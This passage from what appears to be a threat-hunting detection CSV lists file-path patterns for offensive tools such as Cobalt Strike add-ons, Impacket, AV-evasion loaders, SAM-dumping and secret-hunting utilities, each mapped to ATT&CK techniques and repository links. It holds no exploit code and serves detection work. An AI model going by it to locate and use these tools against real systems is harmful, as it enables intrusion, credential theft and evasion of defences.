T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*/AtomLdr.git*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*/attackercan/*","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/AttackServers/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/AttackSurfaceMapper.git*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/Augustus.git*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*/auth/cc2_auth.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*/autotimeliner*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/avet.git*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*/avet_fabric.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/avet_script_config.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*/avoid_badchars.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/awesome-burp-extensions/*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*/awesome-pentest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/AWS-Loot*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*/Azure-AccessPermissions.git*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*/AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*/AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*/BabelStrike.git*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*/BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*/BackDoor*","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/backoff.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Backstab.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/Backstab/Backstab*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/backstab_src/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*/BackupOperatorToDA.git*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*/BackupPrivSam/*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*/bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BadZure.git*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*/BadZure/*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*/banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BaseNEncoder.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation 